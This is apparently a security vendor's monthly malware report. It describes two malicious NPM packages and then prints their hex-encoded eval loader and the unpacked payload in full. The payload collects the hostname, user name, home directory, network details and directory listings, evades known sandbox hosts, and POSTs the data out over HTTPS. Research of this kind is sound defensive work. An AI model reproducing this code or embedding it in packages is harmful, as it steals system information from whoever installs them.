Phylum's Monthly Malware Report: May 2022 - Precarious Payloads

To combat software supply chain attacks, Phylum has been purpose-built to provide near-real-time, proactive analysis of packages as they are published.

Published on

May 19, 2022

Written by

Louis Lang, CTO

Category

Research

To combat the massive uptick in software supply chain attacks and proactively defend against threats borne by the open-source ecosystem, Phylum has been purpose-built to provide near-real-time, proactive analysis of packages as they are published. Given how vast these ecosystems are today, simply hiring security talent to attempt the analysis is a losing battle. In the past 30 days, Phylum has processed a total of 210,034 packages across three ecosystems (NPM, PyPI, and RubyGems), 178,635 of them from NPM alone. Processing ran at a reported average of 5,762 packages per day, which amounts to an average of 3,571,566 source files analyzed every 24 hours and 110,718,566 total files in the last month.

Repository Statistics

Package Registry    No. of Packages
NPM                         178,635
PyPI                         29,277
RubyGems                      2,122

Total Package Analysis

Analysis, last 30 days                 Count
Total Packages Analyzed              210,034
Total Files Examined             110,718,566
Malicious Packages Identified             84

Breakout by File Type

Filetype                     Count
TypeScript              41,773,936
JavaScript              53,844,473
ECMAScript modules       1,725,324
Ruby                     1,131,348
Python                   9,430,753
TSX                      2,227,306
CommonJS modules           273,257
Bash                       120,821
Java                       191,315
Total                  110,718,566

Phylum’s heuristics, analytics, and machine learning models combed through these packages as they were published, resulting in the identification and conviction of 84 malicious packages in the last 30 days. On average, results were returned within 10.5 minutes of publication.

Many of these packages were tied to existing campaigns (detailed below), along with some new (apparent) rogue actors.

Precarious Payloads

Highlights among the packages uncovered this month include several releases of an NPM library called turbine_helper and a related package named bfs-hello-world. Both packages featured extremely high release versions, starting in the high 90s for the major version.
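A package whose earliest release already carries a major version in the 90s is unusual, and that trait is easy to check mechanically. The following is a minimal sketch of such a check, not Phylum's actual heuristic: the function names `parseMajor` and `hasSuspiciousMajor`, the threshold of 90, and the example version strings are all assumptions made for illustration.

```javascript
// Hypothetical heuristic: flag a package whose lowest known release
// already carries a very large major version number.
const MAJOR_THRESHOLD = 90; // assumed cutoff, chosen only for illustration

function parseMajor(version) {
  // Accepts strings such as "99.10.9"; returns NaN for anything else.
  const match = /^(\d+)\.\d+\.\d+/.exec(version);
  return match ? Number(match[1]) : NaN;
}

function hasSuspiciousMajor(versions, threshold = MAJOR_THRESHOLD) {
  const majors = versions.map(parseMajor).filter(Number.isFinite);
  if (majors.length === 0) return false;
  // Only the lowest major matters: a long-lived package may legitimately
  // reach a high version, but it would also have low-numbered releases.
  return Math.min(...majors) >= threshold;
}

console.log(hasSuspiciousMajor(["97.0.0", "98.1.2"])); // true
console.log(hasSuspiciousMajor(["1.0.0", "97.0.0"]));  // false
```

On its own, a signal like this would produce false positives, so it is best read as one input among several rather than a verdict.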

Both sets of samples contained a nearly identical, hex-encoded payload. The general wrapper looked something like the following:


    const packageJSON = require("./package.json");
    const package = packageJSON.name;

    function hexify(p, data) {
        const bufferText = Buffer.from(data, 'hex');
        const text = bufferText.toString('ascii');
        return text.replace('$$$$$$', p);
    }

    hello = eval;
    image = "<long, hex encoded payload>";

    function render(image) {
        eval(hexify(package, hexify(package, image)));
    }

    render(image);

    function mapResult(result) {
        return {
            success: result.success,
            error: result.error && parser.getTrace(result.error.message)
        }
    }

There were slight variations between releases: the payload shown above is double hex-encoded, whereas in some of the turbine_helper releases it had only a single layer of encoding.
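Because the number of encoding layers varies, an analyst may want to peel the layers off without ever passing the result to eval. The sketch below shows one way to do that, under stated assumptions: `isHex` and `peelHexLayers` are hypothetical helper names, the five-layer limit is arbitrary, and the sample string is a harmless stand-in built here, not the real payload. The `$$$$$$` placeholder that the wrapper substitutes with the package name is left untouched.

```javascript
// Returns true when the string is non-empty, even-length hexadecimal.
function isHex(text) {
  return text.length > 0 && text.length % 2 === 0 && /^[0-9a-fA-F]+$/.test(text);
}

// Decodes hex repeatedly until the result is no longer hex, up to maxLayers.
// The decoded text is returned for inspection and is never executed.
function peelHexLayers(payload, maxLayers = 5) {
  let text = payload;
  let layers = 0;
  while (layers < maxLayers && isHex(text)) {
    text = Buffer.from(text, "hex").toString("ascii");
    layers += 1;
  }
  return { text, layers };
}

// Build a harmless double-encoded stand-in for the real payload.
const toHex = (s) => Buffer.from(s, "utf8").toString("hex");
const sample = toHex(toHex('console.log("$$$$$$")'));

const result = peelHexLayers(sample);
console.log(result.layers); // 2
console.log(result.text);   // console.log("$$$$$$")
```

One limitation of this approach: a decoded plaintext that happens to consist only of hex characters would be decoded one layer too far, which is why the layer count is capped and returned alongside the text.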

When unpacked, it had a very straightforward payload which would survey and exfiltrate a variety of items from the system:


{
	const os = require("os");
    const dns = require("dns");
    const querystring = require("querystring");
    const https = require("https");
    const fs = require('fs');
    var path = require('path');
    
    function unhexify(data) {
        const bufferText = Buffer.from(data, 'hex');
        const text = bufferText.toString('ascii');
        return text;
    }
    
    function enhexify(data){
        const bufferText = Buffer.from(data, 'utf8');
        const text = bufferText.toString('hex');
        return text;
    }
    
    function checkuuid(inputString) {
        var re = /^[0-9a-f]+-[0-9a-f]+-[0-9a-f]+-[0-9a-f]+-[0-9a-f]+$/g;
        if (re.test(inputString)) {
            return true
        } else {
            return false;
        }
    }
    
    function checkhex(inputString) {
        var re = /^[0-9a-f]+$/g;
        if (re.test(inputString)) {
            return true
        } else {
            return false;
        }
    }
    
    function checkpath(inputString) {
        var re = /^\/root\/extract[0-9]+\/package$/g;
        if (re.test(inputString)) {
            return true
        } else {
            return false;
        }
    }
    
    function isValid(hostname, path, username) {
        if (hostname == unhexify("4445534b544f502d3445314953304b") && 
            username == unhexify("6461617361646d696e")) return false;
        else if (hostname == unhexify('626f78')) return false;
        else if (checkhex(hostname)) return false;
        else if (checkuuid(hostname)) return false;
        else if (hostname == unhexify('6c696c692d7063')) return false; 
        else if (hostname == unhexify('6177732d3767726172613931336f6964356a736578676b71')) 
        	return false;
        else if (hostname == unhexify('696e7374616e6365')) return false;
        else return true;
    }
    
    // List the entries directly under each of the given directories.
    function getFiles(paths) {
        var ufiles = [];
        for (var j = 0; j < paths.length; j++) {
            try {
                mpath = paths[j];
                files = fs.readdirSync(mpath);
                for (var i = 0; i < files.length; i++) {
                    ufiles.push(path.join(mpath, files[i]))
                }
            } catch (error) {
                // console.log(error)
            }
        }
        return ufiles;
    }
     
    function isprivate(ip) { 
        if (ip.startsWith('fe80::') || ip=="::1" ) return true; 
        var parts=ip.split('.'); 
        return parts[0]==='10'  
            || (parts[0]==='172' && (parseInt(parts[1], 10)>= 16 && parseInt(parts[1], 10) <= 31)) 
            || (parts[0]==='192' && parts[1]==='168') 
            || (parts[0]==='127' && parts[1]==='0'&& parts[2]==='0');
    } 
    
    // Collect the addresses of every network interface except "lo".
    function gethttpips() {
        var str = [];
        var networkInterfaces = os.networkInterfaces();
        for (item in networkInterfaces) {
            if (item != "lo") {
                for (var i = 0; i < networkInterfaces[item].length; i++) {
                    str.push(networkInterfaces[item][i].address);
                }
            }
        }
        return str;
    }
    
    const td={ 
        p: '$$$$$$', 
        c: __dirname, 
        hd: os.homedir(), 
        hn: os.hostname(), 
        un: os.userInfo().username, 
        dns: JSON.stringify(dns.getServers()), 
        ip: JSON.stringify(gethttpips()), 
        dirs: JSON.stringify(getFiles(["C:\\", "D:\\" , "/" , "/home" ])), 
    } 
    
    if (isValid(td.hn, td.c, td.un)) { 
        const trackingData=JSON.stringify(td); 
        var postData=querystring.stringify({ msg: enhexify(trackingData) }); 
        var options={ 
            hostname: "" , 
            port: 443, 
            path: "/" ,
            method: "POST" ,
            headers: { 
            	"Content-Type" : "application/x-www-form-urlencoded" , 
                "Content-Length" : postData.length, 
            }
        }; 
        var req=https.request(options, (res) => {
            res.on("data", (d) => {
                //process.stdout.write(d);
            });
        });
        req.on("error", (e) => {
            // console.error(e);
        });
        req.write(postData);
        req.end();
    }
}   

The collected data includes listings of the entries directly under C:\, D:\, /, and /home, the hostname, the current user's name and home directory path, and DNS and local network information. It is sent only when the isValid function above returns true, that is, when the hostname is neither purely hexadecimal nor UUID-shaped and the system is not one of the following specifically identified hosts:

  • DESKTOP-4E1IS0K (only when the current user is daasadmin)
  • box
  • lili-pc
  • aws-7grara913oid5jsexgkq
  • instance
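The names above come from decoding the hex constants in isValid. A minimal sketch of that decoding step follows; the constants are copied from the payload, while the `encoded` and `decoded` variable names are introduced here for illustration.

```javascript
// Hex constants copied from the isValid function in the unpacked payload.
const encoded = [
  "4445534b544f502d3445314953304b",
  "6461617361646d696e",
  "626f78",
  "6c696c692d7063",
  "6177732d3767726172613931336f6964356a736578676b71",
  "696e7374616e6365",
];

// Same decoding the payload performs: hex bytes interpreted as ASCII.
function unhexify(data) {
  return Buffer.from(data, "hex").toString("ascii");
}

const decoded = encoded.map(unhexify);
for (const value of decoded) {
  console.log(value);
}
// DESKTOP-4E1IS0K
// daasadmin
// box
// lili-pc
// aws-7grara913oid5jsexgkq
// instance
```

The second value, daasadmin, is the username rather than a hostname; the payload compares it only together with DESKTOP-4E1IS0K.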

Why Phylum & What’s Coming Next…

Phylum’s capabilities extend beyond pure source code analysis. We have constructed authorship models that, in combination with other metrics, allow us to identify odd behaviors around commits and activity. We also analyze maintainer information for a package, allowing us to spot packages that have recently changed ownership and may be at risk for the introduction of malware (as was the case with event-stream in 2018).

We recently released support for C#/NuGet and Java/Maven and, looking forward, we are preparing to add the Golang and Rust ecosystems. In addition, we are pushing hard to increase both the sophistication and the number of our heuristics and analytics.

Phylum, at its core, is a risk detection system focusing on the software supply chain. Unlike other SCA products that focus nearly exclusively on well-known issues, we are looking for the unknown unknowns - the subtle modifications to a software package that will surreptitiously exfiltrate keys to your critical infrastructure. We do this at the scale of open source, tackling the problem in an automated fashion, to make software supply chain security proactive instead of merely reactive.

To learn more about Phylum’s automated malware identification capability and how we support secure and efficient use of open-source software, please contact us for a conversation.
